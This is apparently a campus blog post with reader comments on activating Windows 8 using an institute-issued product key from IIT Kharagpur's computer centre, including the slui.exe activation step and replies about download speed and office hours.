|
refinedweb
|
csMatrix3 Class ReferenceA 3x3 matrix.
More...
[Geometry utilities]
#include <csgeom/matrix3.h>
Inheritance diagram for csMatrix3:
Detailed DescriptionA 3x3 matrix.
Definition at line 38 of file matrix3.h.
Constructor & Destructor Documentation
Construct a matrix from axis-angle specifier.
Member Function Documentation
Compute the determinant of this matrix.
Return the inverse of this matrix.
Definition at line 144 of file matrix3.h.
References m11, m21, and m31.
Referenced by csReversibleTransform::SetO2T(), and csReversibleTransform::SetT2O().
Return the transpose of this matrix.
Referenced by csOrthoTransform::SetO2T(), and csOrthoTransform::SetT2O().
Set this matrix to the identity matrix.
Check if the matrix is identity.
Multiply this matrix with a scalar.
Multiply another matrix with this matrix.
Add another matrix to this matrix.
Subtract another matrix from this matrix.
Divide this matrix by a scalar.
Initialize matrix with a quaternion.
Transpose this matrix.
Friends And Related Function Documentation
Multiply a matrix and a scalar.
Multiply a matrix and a scalar.
Multiply two matricies.
Check if two matricies are not equal.
Add two matricies.
Subtract two matricies.
Divide a matrix by a scalar.
Test if each component of a matrix is less than a small epsilon value.
Check if two matricies are equal.
Test if each component of a matrix is greater than a small epsilon value.
The documentation for this class was generated from the following file:
Generated for Crystal Space 1.0.2 by doxygen 1.4.7
|
http://www.crystalspace3d.org/docs/online/api-1.0/classcsMatrix3.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
System.Messaging Namespace
The System.Messaging namespace provides classes that allow you to connect to, monitor, and administer message queues on the network and send, receive, or peek messages.
Members of the MessageQueue class include the following methods for reading and writing messages to the queue:
The Send method enables your application to write messages to the queue. Overloads of the method enable you to specify whether to send your message using a Message (which provides detailed control over the information you send) or any other managed object, including application-specific classes. The method also supports sending messages as part of a transaction.
The Receive, ReceiveById, and ReceiveByCorrelationId methods provide functionality for reading messages from a queue. Like the Send method, these methods provide overloads that support transactional queue processing. These methods also provide overloads with time-out.
Out parameters that enable processing to continue if the queue is empty. Because these methods are examples of synchronous processing, they interrupt the current thread until a message is available, unless you specify a time-out.
The Peek method is similar to Receive, but it does not cause a message to be removed from the queue when it is read. Because Peek does not change the queue contents, there are no overloads to support transactional processing. However, because Peek, like Receive, reads messages synchronously from the queue, overloads of the method do support specifying a time-out in order to prevent the thread from waiting indefinitely.
The BeginPeek, EndPeek(IAsyncResult), BeginReceive, and EndReceive(IAsyncResult) methods provide ways to asynchronously read messages from the queue. They do not interrupt the current thread while waiting for a message to arrive in the queue.
The following methods of the MessageQueue class provide functionality for retrieving lists of queues by specified criteria and determining if specific queues exist:
GetPrivateQueuesByMachine(String) enables the retrieval of the private queues on a computer.
GetPublicQueuesByCategory(Guid), GetPublicQueuesByLabel(String), and GetPublicQueuesByMachine(String) provide ways to retrieve public queues by common criteria. An overload of GetPublicQueues provides even finer detail for selecting queues based on a number of search criteria.
Other methods of the MessageQueue class provide the following functionality:
Creating and deleting Message Queueing queues.
Using a message enumerator to step through the messages in a queue.
Using a queue enumerator for iterating through the queues on the system.
Setting ACL-based access rights.
Working with the connection cache.
The Message class provides detailed control over the information you send to a queue, and is the object used when receiving or peeking messages from a queue. Besides the message body, the properties of the Message class include acknowledgment settings, formatter selection, identification, authentication and encryption information, timestamps, indications about using tracing, server journaling, and dead-letter queues, and transaction data.
The MessageQueue component is associated with the following three formatters, which enable you to serialize and deserialize messages sent and received from queues:
The XmlMessageFormatter provides loosely coupled messaging, enabling independent versioning of serialized types on the client and server.
The ActiveXMessageFormatter is compatible with the MSMQ COM control. It allows you to send types that can be received by the control and to receive types that were sent by the control.
The BinaryMessageFormatter provides a faster alternative to the XmlMessageFormatter, but without the benefit of loosely coupled messaging.
Other classes in the Messaging namespace support code-access and ACL-based security, filtering Message properties when reading messages from a queue, and using transactions when sending and receiving messages.
|
http://msdn.microsoft.com/en-US/library/system.messaging(v=vs.90).aspx
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Configuring Event Log Properties
Microsoft® Windows® 2000 Scripting Guide
Depending on the role played by a computer, you might need to change the default event log settings for that computer. If the default settings remain unchanged for all the computers in an organization, a domain controller that records thousands of events each day will be configured exactly the same as a workstation that records only 15 or 20 events a day. As a result, the domain controller might fail to record a number of important events, either because its event logs fill up too quickly or because some events might be overwritten before they can be archived.
Event log properties have typically been configured by means of the Event Viewer, a graphical user utility that has two major limitations: Event Viewer can configure only one event log on a single computer at a time, and Event Viewer cannot automate the process of configuring event logs. Because manually configuring event logs on an individual basis can be very time-consuming, administrators often leave the default settings as-is, even if those settings are not optimal for the roles played by certain computers. In turn, this means important events might not be recorded, or might be overwritten before they can be archived.
WMI enables you to write scripts that can programmatically configure event log properties. Two of the most important properties are shown in Table 12.3.
Table 12.3 Event Log Properties Configurable with WMI
When you reconfigure an event log, the changes you make do not take effect until the event log has been cleared. If you want the reconfiguration to take effect immediately, create your script to first reconfigure and then to back up and clear the event log.
Scripting Steps
Listing 12.4 contains a script that configures the maximum size and the overwrite policy for all the event logs on a computer. To carry out this task, the script must perform the following steps:
Create a constant named wbemFlagUseAmendedQualifiers and set the value to &h2000.
This constant is required when using the Put_ method to apply changes to an event log.
Create a variable to specify the computer name.
Use a GetObject call to connect to the WMI namespace root\cimv2, and set the impersonation level to "impersonate."
The Security privilege is included in the moniker so that the script can access all the event logs, including the Security event log.
Use the ExecQuery method to query the Win32_NTEventLogFile class. This returns a collection consisting of all the event logs on the computer.
Retrieve the name of the first event log in the connection.
Set the maximum file size to 400 megabytes (approximately 4194304).
Set the overwrite policy so that all records older than 14 days are overwritten.
Use the Put_ method to write the changes to the event log. You must include the wbemFlagUseAmendedQualifiers flag, or the script will fail.
Repeat the process with the next event log in the collection.
Listing 12.4 Configuring Event Log Properties
|
http://technet.microsoft.com/en-us/library/ee176701.aspx
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
WSDL Essentials, Page 2
WSDL Invocation Tools, Part II
Our initial discussion of WSDL invocation tools focused on programming and command-line invocation tools. We now move on to even simpler tools that are entirely driven by a web-based interface.
The GLUE Console
In addition to supporting a number of command-line tools, the GLUE platform also supports a very intuitive web interface for deploying new services and connecting to existing services.
console
This will automatically start the GLUE console on the default port 8100. Open a web browser and you will see the GLUE console home page. (See Figure 6-5.)
In the text box entitled WSDL, you can enter the URL for any WSDL file. For example, try entering the URL for the eBay Price Watcher Service,.
Click the WSDL button, and you will see the Web Service overview
page. (See Figure
6-6.) This page includes a description of the specified service (extracted
from the WSDL
document element) and a list of
public operations. In the case of the eBay service, you should see a single
getCurrentPrice method.
Click the
getCurrentPrice method, and
you will see the Web Method overview page. (See Figure
6-7.) This page includes a text box where you can specify the input
auction ID.
Enter an auction ID, click the Send button, and GLUE will automatically invoke the remote method and display the results at the bottom of the page. For example, Figure 6-8 shows the current bid price for the Handspring Visor Deluxe. Note that the price has already gone up $10 since invoking the service via the GLUE command-line tool!
SOAPClient.com
If you would like to try out a web-based interface similar to GLUE, but don't want to bother downloading the GLUE package, consider the Generic SOAP Client available at SOAPClient.com.
Figure 6-9 shows the opening screen to the Generic SOAP Client. Much like the GLUE console, you can specify the address for a WSDL file in this screen.
Specify the same eBay Price Watcher Service WSDL file, and the SOAP Client will display a text box for entering the auction ID. (See Figure 6-10.)
Figure 6-11 displays the result of the eBay service invocation. The Handspring Visor is up another $4!
Automatically Generating WSDL Files
One of the best aspects of WSDL is that you rarely have to create WSDL files from scratch. A whole host of tools currently exists for transforming existing services into WSDL descriptions. You can then choose to use these WSDL files as is or manually tweak them with your favorite text editor. In the discussion that follows, we explore the WSDL generation tool provided by GLUE.
TIP: If you create WSDL files from scratch or tweak WSDL files generated by a tool, it is a good idea to validate your final WSDL documents. You can download a WSDL validator from. This package requires that you have an XSLT engine and the zvonSchematron (), but installation only takes a few minutes. Once installed, the validator is well worth the effort and creates nicely formatted HTML reports indicating WSDL errors and warnings.
GLUE java2wsdl Tool
The GLUE platform includes a
java2wsdl command-line tool for transforming Java
services into WSDL descriptions. The command-line usage is as follows:
usage: java2wsdl <arguments>
where valid arguments are:
classname name of java class
-d directory output directory
-e url endpoint of service
-g include GET/POST binding
-m map-file read mapping instructions
-n namespace namespace for service
-r description description of service
-s include SOAP binding
-x command-file command file to execute
Complete information on each argument is available online within the GLUE User Guide at. For now, we will focus on the most basic arguments.
For example, consider the
PriceService class in Example
6-4. The service provides a single
getPrice( )
method.
Example 6-4: PriceService.java
package com.ecerami.soap.examples;
import java.util.Hashtable;
/**
* A Sample SOAP Service
* Provides Current Price for requested Stockkeeping Unit (SKU)
*/
public class PriceService {
protected Hashtable products;
/**
* Zero Argument Constructor
* Load product database with two sample products
*/
public PriceService ( ) {
products = new Hashtable( );
// Red Hat Linux
products.put("A358185", new Double (54.99));
// McAfee PGP Personal Privacy
products.put("A358565", new Double (19.99));
}
/**
* Provides Current Price for requested SKU
* In a real-setup, this method would connect to
* a price database. If SKU is not found, method
* will throw a PriceException.
*/
public double getPrice (String sku)
throws ProductNotFoundException {
Double price = (Double) products.get(sku);
if (price == null) {
throw new ProductNotFoundException ("SKU: "+sku+" not found");
}
return price.doubleValue( );
}
}
To generate a WSDL file for this class, run the following command:
java2wsdl com.ecerami.soap.examples.PriceService -s -e:
8080/soap/servlet/rpcrouter -n urn:examples:priceservice
The
-s option directs GLUE to create
a SOAP binding; the
-e option specifies the address
of our service; and the
-n option specifies the
namespace URN for the service. GLUE will generate a PriceService.wsdl file. (See Example
6-5.)
TIP: If your service is defined via a Java interface and you include your source files within your CLASSPATH, GLUE will extract your Javadoc comments, and turn these into WSDL
documentationelements.
Example 6-5: PriceService.wsdl (automatically generated by GLUE)
<?xml version='1.0' encoding='UTF-8'?>
<!--generated by GLUE-->
<definitions name='com.ecerami.soap.examples.PriceService'
targetNamespace='.
examples.PriceService/'
xmlns:tns='.
examples.PriceService/'
xmlns:electric=''
xmlns:soap=''
xmlns:http=''
xmlns:mime=''
xmlns:xsd=''
xmlns:soapenc=''
xmlns:
<message name='getPrice0SoapIn'>
<part name='sku' type='xsd:string'/>
<message name='getPrice0SoapOut'>
<part name='Result' type='xsd:double'/>
<portType name='com.ecerami.soap.examples.PriceServiceSoap'>
<operation name='getPrice' parameterOrder='sku'>
<input name='getPrice0SoapIn' message='tns:getPrice0SoapIn'/>
<output name='getPrice0SoapOut' message='tns:getPrice0SoapOut'/>
</operation>
</portType>
<binding name='com.ecerami.soap.examples.PriceServiceSoap'
type='tns:com.ecerami.soap.examples.PriceServiceSoap'>
<soap:binding
<operation name='getPrice'>
<soap:operation
<input name='getPrice0SoapIn'>
<soap:body
</input>
<output name='getPrice0SoapOut'>
<soap:body
</output>
</operation>
</binding>
<service name='com.ecerami.soap.examples.PriceService'>
<port name='com.ecerami.soap.examples.PriceServiceSoap'
binding='tns:com.ecerami.soap.examples.PriceServiceSoap'>
<soap:address location='
/soap/servlet/ rpcrouter'/>
</port>
</service>
</definitions>
You can then invoke the service via SOAP::Lite:
use SOAP::Lite;
print "Connecting to Price Service...\n";
print SOAP::Lite
-> service('')
-> getPrice ('A358185');
Hopefully, this example illustrates the great promise of web service interoperability. We have a WSDL file generated by GLUE, a server running Java, and a client running Perl, and they all work seamlessly together.
Connecting to Price Service...
54.99
WARNING: The IBM Web Services Toolkit (available at) provides a WSDL generation tool called
wsdlgen. This tool can take existing Java classes, Enterprise JavaBeans, and Microsoft COM objects and automatically generate corresponding WSDL files. However, as this book goes to press, the
wsdlgentool creates files based on the 1999 version of the W3C XML Schema. The WSDL files are therefore incompatible with other WSDL invocation tools, such as SOAP::Lite and GLUE. If you choose to use the IBM tool, make sure to manually update your WSDL files to reflect the latest version of XML Schema ().
Page 2 of 4
|
http://www.developer.com/services/article.php/10928_1602051_2/WSDL-Essentials.htm
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Mastering phpMyAdmin 3.1 for Effective MySQL Management — Save 50%
Increase your MySQL productivity and control by discovering the real power of phpMyAdmin 3.1.
Magic methods
For starters, let's take a look at the magic methods PHP provides. We will first go over the non-overloading methods.
__construct and __destruct
class SomeClass {
public function __construct() {
}
public function __destruct() {
}
}
The most common magic method in PHP is __construct. In fact, you might not even have thought of it as a magic method at all, as it's so common. __construct is the class constructor method, which gets called when you instantiate a new object using the new keyword, and any parameters used will get passed to __construct.
$obj = new SomeClass();
__destruct is __construct's "pair". It is a class destructor, which is rarely used in PHP, but still it is good to know about its existence. It gets called when your object falls out of scope or is garbage collected.
function someFunc() {
$obj = new SomeClass();
//when the function ends, $obj falls out of scope and SomeClass __destruct is called
}
someFunc();
If you make the constructor private or protected, it means that the class cannot be instantiated, except inside a method of the same class. You can use this to your advantage, for example to create a singleton.
__clone
class SomeClass {
public $someValue;
public function __clone() {
$clone = new SomeClass();
$clone->someValue = $this->someValue;
return $clone;
}
}
The __clone method is called when you use PHP's clone keyword, and is used to create a clone of the object. The purpose is that by implementing __clone, you can define a way to copy objects.
$obj1 = new SomeClass();
$obj1->someValue = 1;
$obj2 = clone $obj1;
echo $obj2->someValue;
//echos 1
Important: __clone is not the same as =. If you use = to assign an object to another variable, the other variable will still refer to the same object as the first one! If you use the clone keyword, the purpose is to return a new object with similar state as the original. Consider the following:
$obj1 = new SomeClass();
$obj1->someValue = 1;
$obj2 = $obj1;
$obj3 = clone $obj1;
$obj1->someValue = 2;
What are the values of the someValue property in $obj2 and $obj3 now? As we have used the assign operator to create $obj2, it refers to the same object as $obj1, thus $obj2->someValue is 2. When creating $obj3, we have used the clone keyword, so the __clone method was called. As __clone creates a new instance, $obj3->someValue is still the same as it was when we cloned $obj1: 1.
If you want to disable cloning, you can make __clone private or protected.
__toString
class SomeClass {
public function __toString() {
return 'someclass';
}
}
The __toString method is called when PHP needs to convert class instances into strings, for example when echoing:
$obj = new SomeClass();
echo $obj;
//will output 'someclass'
This can be a useful example to help you identify objects or when creating lists. If we have a user object, we could define a __toString method which outputs the user's first and last names, and when we want to create a list of users, we could simply echo the objects themselves.
__sleep and __wakeup
class SomeClass {
private $_someVar;
public function __sleep() {
return array('_someVar');
}
public function __wakeup() {
}
}
These two methods are used with PHP's serializer: __sleep is called with serialize(), __wakeup is called with unserialize(). Note that you will need to return an array of the class variables you want to save from __sleep. That's why the example class returns an array with _someVar in it: Without it, the variable will not get serialized.
$obj = new SomeClass();
$serialized = serialize($obj);
//__sleep was called
unserialize($serialized);
//__wakeup was called
You typically won't need to implement __sleep and __wakeup, as the default implementation will serialize classes correctly. However, in some special cases it can be useful. For example, if your class stores a reference to a PDO object, you will need to implement __sleep, as PDO objects cannot be serialized.
As with most other methods, you can make __sleep private or protected to stop serialization. Alternatively, you can throw an exception, which may be a better idea as you can provide a more meaningful error message.
An alternative to __sleep and __wakeup is the Serializable interface. However, as its behavior is different from these two methods, the interface is outside the scope of this article. You can find info on it in the PHP manual.
__set_state
class SomeClass {
public $someVar;
public static function __set_state($state) {
$obj = new SomeClass();
$obj->someVar = $state['someVar'];
return $obj;
}
}
This method is called in code created by var_export. It gets an array as its parameter, which contains a key and value for each of the class variables, and it must return an instance of the class.
$obj = new SomeClass();
$obj->someVar = 'my value';
var_export($obj);
This code will output something along the lines of:
SomeClass::__set_state(array('someVar'=>'my value'));
Note that var_export will also export private and protected variables of the class, so they too will be in the array.
Overloading methods
Now that we've gone through all the non-overloading methods, we can move to the overloading ones.
If you define an overloading magic method, they all have some behavior that's important to know before using them. They only apply to methods and variables that are inaccessible:
- methods or variables that do not exist at all
- variables which are outside the scope
Basically, this means that if you have a public member foo, overloading methods will not get called when you attempt to access it. If you attempt to access member bar, which does not exist, they will.
Also, if you declare a private/protected variable $hiddenVar, and attempt to access it outside the class' own methods, the overloading methods will get called. This applies to classes which inherit the original— any attempt to access the parent's private variables will result in overloading method calls.
__call
class SomeClass {
public function __call($method, $parameters) {
}
}
This magic method is called when the code attempts to call a method which does not exist. It takes two parameters: the method name that was being called, and any parameters that were passed in the call.
$obj = new SomeClass();
$obj->missingMethod('Hello');
//__call is called, with 'missingMethod' as the first parameter and
//array('Hello') as the second parameter
This can be used to implement all kinds of useful things. For example, you can use __call to create automatic getter methods for variables in your class:
class GetterClass {
private $_data = array(
'foo' => 'bar',
'bar' => 'foo'
);
public function __call($method, $params) {
if(substr($method, 0, 3) == 'get') {
//Change the latter part of the method name to lowercase
//so that it matches the keys in the data array
return $this->_data[strtolower(substr($method, 3))];
}
}
}
$obj = new GetterClass();
echo $obj->getBar();
//output: foo
You could also use this to emulate mixins. By storing mixin classes inside a variable in the class, you could use __call to check each of them for a method that's not in the main class.
If you implement __call, any call that attempts to use a method which does not exist will go into it. You should always throw an exception in the end of __call if the method was not handled. This will help prevent bugs that can occur, if you mistype a method name and it goes into call which could silently ignore it.
If you, for some reason, want to create a method with a PHP reserved word as its name, you can fake one using __call. For example, normally you can't have a method called "function" or "class", but with __call it's possible.
__get and __set
class SomeClass {
public function __get($name) {
}
public function __set($name, $value) {
}
}
The __get and __set pair is called when attempting to read or write inaccessible variables, for example:
$obj = new SomeClass();
$obj->badVar = 'hello';
//__set is called with 'badVar' as first parameter and 'hello' as second parameter
echo $obj->otherBadVar;
//__get is called with 'otherBadVar' as the first parameter
__get works similar to __call, in that you can return a value from it. If you don't return a value from __get, the value is assumed to be null.
These two can be used to, for example, creating read-only variables, or C#-style properties which run some code when being read or written.
class PropertyClass {
private $_foo;
public function setFoo($value) {
//some code here
$this->_foo = $value;
}
public function getFoo() {
return $foo;
}
public function __set($name, $value) {
$setter = 'set' . ucfirst($name);
$this->$setter($value);
}
public function __get($name) {
$getter = 'get' . ucfirst($name);
return $this->$getter();
}
}
$obj = new PropertyClass();
//Since foo does not exist, __set is called, and
//set then calls setFoo which can run additional code
$obj->foo = 'something';
Like __call, it's important that you throw an exception if you don't handle a variable in __get or __set. Again, this will help prevent bugs that are caused by misspelled variable names.
__unset and __isset
class SomeClass {
public function __isset($name) {
}
public function __unset($name) {
}
}
If you want to use __get and __set, it's often useful to also implement __unset and __isset. They are called with unset and isset respectively:
$obj = new SomeClass();
isset($obj->someVar);
//calls __isset with 'someVar'
unset($obj->otherVar);
//calls __unset with 'otherVar'
Words of warning about magic methods
While it's possible to do fun things with magic methods, like making setting variables actually call methods, and even completely nonsensical things like making unset ($obj->foo) echo the value of $foo, keep in mind that while they are useful, it's easy to go overboard and make something that's more difficult to maintain because it's confusing.
Magic functions
This topic should probably be just called "magic function", since at the moment there is only one.
__autoload
You can define a function called __autoload to implement a default autoloader. Normally you would need to call spl_autoload_register to register any autoloader functions or methods, but not with __autoload.
function __autoload($class) {
require_once $class . '.php';
}
$obj = new SomeClass();
//assuming SomeClass isn't defined anywhere in the code,
//the __autoload function is now called with 'SomeClass' as its parameter
If you have more complex autoloading logic, you may want to just implement it as a class, similar to Zend_Loader in the Zend Framework, and then register the autoloader method manually with spl_autoload_register or a special method of the class.
Magic constants
Magic constants are special predefined constants in PHP. Unlike other predefined constants, magic constants have a different value depending on where you use them. All of them use a similar naming style: __NAME__ - that is, two underscores, name in upper case, and then two more underscores.
Here are all the magic constants:
You can use __FUNCTION__ inside class methods. In this case, it will return just the method's name, unlike __METHOD__, which will always return the name with class name prefixed.
These constants are mainly useful for using as details in error message, and to assist in debugging. However, there are a few other uses as well.
Here's an example of throwing an exception with magic constants in the message: throw new Exception('Error in file ' . __FILE__. 'on line ' . __LINE__);
It's worth noting that exception backtraces already come with the file and line.
__FILE__ can be used to get the current script's directory:
dirname(__FILE__);
With __CLASS__, it's possible to determine a parent class' name:
class Parent {
public function someMethod() {
echo __CLASS__;
}
}
class Child extends Parent {
}
$obj = new Child();
$obj->someMethod();
//Will output: Parent
Finally, the more special __COMPILER_HALT_OFFSET__ can only be used when a file contains a call to __halt_compiler(). This is a special PHP function, which will end the compiling of the file at the point where the function is called. Any data after this will be ignored. You could use this, for example, to store some additional data. You can then read this data by reading the current file, and looking at __COMPILER_HALT_OFFSET__. The usage of this approach is outside the scope of this article, so check the PHP manual for more details.
PHP 5.3 magic features
Lastly, let us check out what new magic methods and constants PHP 5.3 brings to the table!
New magic methods in PHP 5.3
PHP 5.3 adds two new magic methods: __invoke and __callStatic.
class NewMethodsClass {
public static function __callStatic($method, $parameters) {
}
public function __invoke($parameters) {
}
}
__callStatic is the same as __call, except it's used in static context:
NewMethodsClass::someStaticMethod('Hi');
//calls __callStatic with 'someStaticMethod' and array('Hi')
As with __call, remember to throw an exception if you don't handle some method in __callStatic, so that you prevent any bugs that are caused by mistyped method names.
__invoke is a more interesting: It gets called when you use a class instance like a function
$obj = new NewMethodsClass();
$obj('Hi');
//calls __invoke with 'Hi'
This could be useful for implementing the command pattern, or to create something similar as the Runnable or Callable interfaces in Java.
New magic constants in PHP 5.3
PHP 5.3 adds two new magic constants: __DIR__ and __NAMESPACE__
__DIR__ is the same as calling dirname(__FILE__)
__NAMESPACE__ contains the current namespace, which is a new feature of PHP 5.3.
New magic functions in PHP 5.3
PHP 5.3 does not add any new magic functions.
Summary
PHP contains magic methods, magic constants and a magic function, which are special features of the PHP language and can be used for various purposes. They are some of the features in PHP that makes it stand out from the crowd, as not many others provide similar capabilities, and as such, any serious PHP programmer should know them.
About the Author :
Jani Hartikainen
Jani Hartikainen is a finnish web-developer. He has been programming in PHP for over 6 years, and is also skilled in various other technologies such as JavaScript, C# and Python. Visit his programming blog at.
Books From Packt
Post new comment
|
http://www.packtpub.com/article/php-magic-features
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Dear Perl Monks,
I need a help in Win32::API
I am working on a hardware test automation, The interface to hardware is USB-I2C and we have a C DLL which exports set of functions to communicate with hardware.
I am trying to import the C DLL via Win32::API module so i can automate some test cases via perl. Right now, I could able to read & write to particular memory address using the exported APIs in DLL
I have a problem with one API , Which is i2cGetDeviceAddress , it returns unsigned char. I could not able to properly use Win32::API to get the data from this API. This API is working well in C code
I have given API prototype in C , C code and its output and my perl code
Please help me to use 'unsigned char' with Win32::API module.
use Win32::API;
#C proptype
# typedef unsigned char __stdcall i2cGetDeviceAddress_type();
# extern i2cGetDeviceAddress_type *i2cGetDeviceAddress;
#C++ Prototype
# extern "C" Byte __stdcall i2cGetDeviceAddress(void);
# C Code
# printf ("\n \n DEV: %d , %c , %x ", i2cGetDeviceAddress(),i2cGetDevi
+ceAddress(),i2cGetDeviceAddress());
#
# Output: DEV: 70 , F , 46
#Perl Code
# When i use 'char' as a return type , API is not returning anything
# my $i2cGetDeviceAddressFunc = Win32::API->new('CrdI2C32', 'char i2cG
+etDeviceAddress()') or warn "\n ERROR: Can not import API:i2cGetDevic
+eAddress , $^E ,";
# When i use 'unsigned char' as a return type, I get, Win32::API::pars
+e_prototype: WARNING unknown output parameter type 'unsigned'
#my $i2cGetDeviceAddressFunc = Win32::API->new('CrdI2C32', 'unsigned c
+har i2cGetDeviceAddress()') or warn "\n ERROR: Can not import API:i2c
+GetDeviceAddress , $^E ,";
# So, I used INT , The following way is working for some other API but
+ not this API :(();
$ret = unpack ('C*',pack ("i",$ret));
print "\n $ret "; # prints 152
$ret = sprintf ("0x%X",$ret);
print "\n $ret"; #prints 0x98 but i wanted 0x46
[download]
Update:
OS: Windows 7
Perl: Active Perl 5.12 , x86 flavour (MSWin32-x86-multi-thread)
UPDATE: Problem is solved
The above code itself is fine. I was confused with API call sequence. When I call I2CWrite API and then i2cGetDeviceAddress , It is providing correct output (i.e 70)
Thanks a Lot to BrowserUk his suggestion was useful to me to implement some other API using Win32::API
Thanks to tye for the $ret &= 0xFF; tip. I did not know this, That is why i am using complex pack & unpack
# So, I used INT , The following way is working for some other API but not this API :(
That should work.
Given this dll:
#include <stdio.h>
__declspec(dllexport) unsigned char __stdcall getChar() {
unsigned char c = (unsigned char)( rand() & 0xFF );
printf( "Returning %d\n", c );
return c;
}
[download]
This script:
#! perl -slw
use strict;
use Win32::API;
my $getChar = Win32::API->Import( 'junkdll', 'int getChar()' )
or die $!, $^E;
print getChar() for 1 .. 10;
[download]
Produces this output:
C:\test>t-w32api.pl
Returning 41
41
Returning 35
35
Returning 190
190
Returning 132
132
Returning 225
225
Returning 108
108
Returning 214
214
Returning 174
174
Returning 82
82
Returning 144
144
[download]
Not the most convenient form (numeric) to receive 'char' data, but you seem to want the numeric value anyway. You're just working too hard at trying to convert the value when there is no need to.
The start of some sanity?
Hi BrowserUk
For some reason, having 'int' and getting data from my DLL is not working
We bought this from other company
The one you have seems to be broken. What size is it? You probably need to send it back under warranty and exchange it for a new one.
Yes
No
A crypto-what?
Results (168 votes),
past polls
|
http://www.perlmonks.org/index.pl?node_id=959112
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
*
Array question
John Powell
Greenhorn
Joined: Nov 13, 2004
Posts: 11
posted
Nov 20, 2004 19:23:00
0
I have a simple array that allows the user to enter in integer values, then prints the values of each index of the array. Is it possible to restrict each index to a different integer. In other words if the user enters in the same integer more than once it only gets stored once. Is this possible?
array[0] = 4
array[1] = 6
array[2] = 6 //doesn't get stored because it exists in [0], try again until unique
array[2] = 8
...etc for 20 unique values
import java.io.*; class TestArray { public static void main(String[] args) throws IOException { int[] array = new int[20]; BufferedReader inData = new BufferedReader(new InputStreamReader( System.in)); for (int i = 0; i < array.length; i++) { System.out.println("Enter an integer: "); array[i] = Integer.parseInt(inData.readLine()); } for (int i = 0; i < array.length; i++) { System.out.println("array [" + i + "] = " + array[i]); } } }
Stan James
(instanceof Sidekick)
Ranch Hand
Joined: Jan 29, 2003
Posts: 8791
posted
Nov 20, 2004 20:12:00
0
With array you'd have to compare each new number to all of the existing numbers if the new one is already there. You could give the user a message and let them try again. So if they were supposed to enter 10 numbers it might take them 15 tries to get the idea that they have to be unique. Is that how you'd picture the program working?
If you're allowed to explore beyond array, look at the JavaDoc for Collection, List and Set. There is one there you'll like.
A good question is never answered. It is not a bolt to be tightened into place but a seed to be planted and to bear more seed toward the hope of greening the landscape of the idea. John Ciardi
Mike Gershman
Ranch Hand
Joined: Mar 13, 2004
Posts: 1272
posted
Nov 20, 2004 20:16:00
0
I assume you know how to replace the for loop with a while or do loop.
In that loop, put an inner loop that searches the exising elements for a duplicate value. If one is found, set a boolean "duplicate" true and break out of the inner loop.
In the outer loop, if duplicate is true, display an error message instead of inserting an array element and incrementing the array index.
Give this a try. If you have a problem, post your code and we'll help.
[ November 20, 2004: Message edited by: Mike Gershman ]
[ November 20, 2004: Message edited by: Mike Gershman ]
Mike Gershman
SCJP 1.4, SCWCD in process
Preetham Chandrasekhar
Ranch Hand
Joined: Nov 05, 2003
Posts: 98
posted
Nov 20, 2004 20:35:00
0
wont Sets solve ur problem...it wont allow duplicate values to be entered and if entered it would be replaced with the existing values.
Preetham
"In theory, there is no difference between theory and practice. But, in practice, there is."<br /> - Jan L.A. van de Snepscheut
John Powell
Greenhorn
Joined: Nov 13, 2004
Posts: 11
posted
Nov 21, 2004 16:38:00
0
Further problems:
I've expanded the original program to read integer values from a file. There are 20 unique values to be stored. In the file there can be multiple instances of each integer (although they will be between 5 and 24). The program should read off all values in the file. Once all values are read it will print off the value of each index and the number of times it appears in the file.
I'm having a hard time figuring out how to record the number of times a value occurs.
import java.io.*; import java.util.*; class arrays { public static void main(String[] args) throws IOException { int[] value = new int[20]; int[] frequency = new int[20]; int number = 0; String filename = "test.txt"; //create array of 20 integers: 5 - 24. for (int i = 0; i < 20; i++) { value[i] = i + 5; } BufferedReader in = new BufferedReader(new FileReader(filename)); String s = new String(); StringTokenizer st; while ((s = in.readLine()) != null) { for (int i = 0; i < 100; i++) { st = new StringTokenizer(s); number = Integer.parseInt(st.nextToken()); frequency[number]++; } } for (int i = 0; i < frequency.length; i++) { System.out.println("array [" + i + "]" + "= " + value[i]+ " occurs " + frequency[i] + " times"); } } }
Michael Dunn
Ranch Hand
Joined: Jun 09, 2003
Posts: 4632
posted
Nov 21, 2004 16:52:00
0
if the values are between 5 and 24, just create an array
int[] fileNumber = new int[25];
then, when you read in each number from the file
int number = [number read in from file, converted to int];
fileNumber[number]++;
at the end, loop through fileNumber[] looking for values > 0
I agree. Here's the link:
subject: Array question
Similar Threads
Code not working...
Iterating over an unknown number of vectors
How would i break this down into seperate metods?
Wanted some help about arrays
something more about arrays
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton
|
http://www.coderanch.com/t/397797/java/java/Array
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
×3. (the 0×3 is important)
- Tap or click the Slui.exe 0× :
damnn useful!!
Does anyone got successful key from CIC ? if yeas then please tell procedure for tht.
Many thanks
As specified in the post, You can get it in person from CIC.
please specify email address of CIC person
is it open for all Indian residents ? or only for student who in campus ?
Only for students in Campus. Infact, the key would work with Institute LAN only.
CIC is providing activation key for free????
To Specific versions of Windows, yes!
does anyone know the emailid of cic
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
please tell the email-id of cic .
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
Can you tell me, how do I do the same from ubuntu?
Ubuntu is free, you don’t need to activate it using licensed key.
am already having windows 8 installed on my PC,but its fake……
do i need a fresh installation or just the key will work???
It would only on the ISOs available on CIC Software Repository.
Where/What is CIC?
Computer and Informatics Center, IIT Kharagpur
can i have email of CIC???
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
what is the CIC email id
can i know whom to meet in cic
Go there and ask about the Windows Product key, they will guide you.
@theDroidMaster
I followed the instruction but the repository takes a lot of time so search DC with the same name and got the 64 bit win 8 file..Now I’m trying to mount the image with Daemon Tool but its saying can’t copy file because its corrupt..Do you have the file with u? Please help
Since many users were downloading yesterday, the server was slow. Try it now through Software Repo, I am getting a good 8 MBPS now.
Can I visit CIC any time to get the key? Do I need to bring the ID card as well?
Visit during office hours.
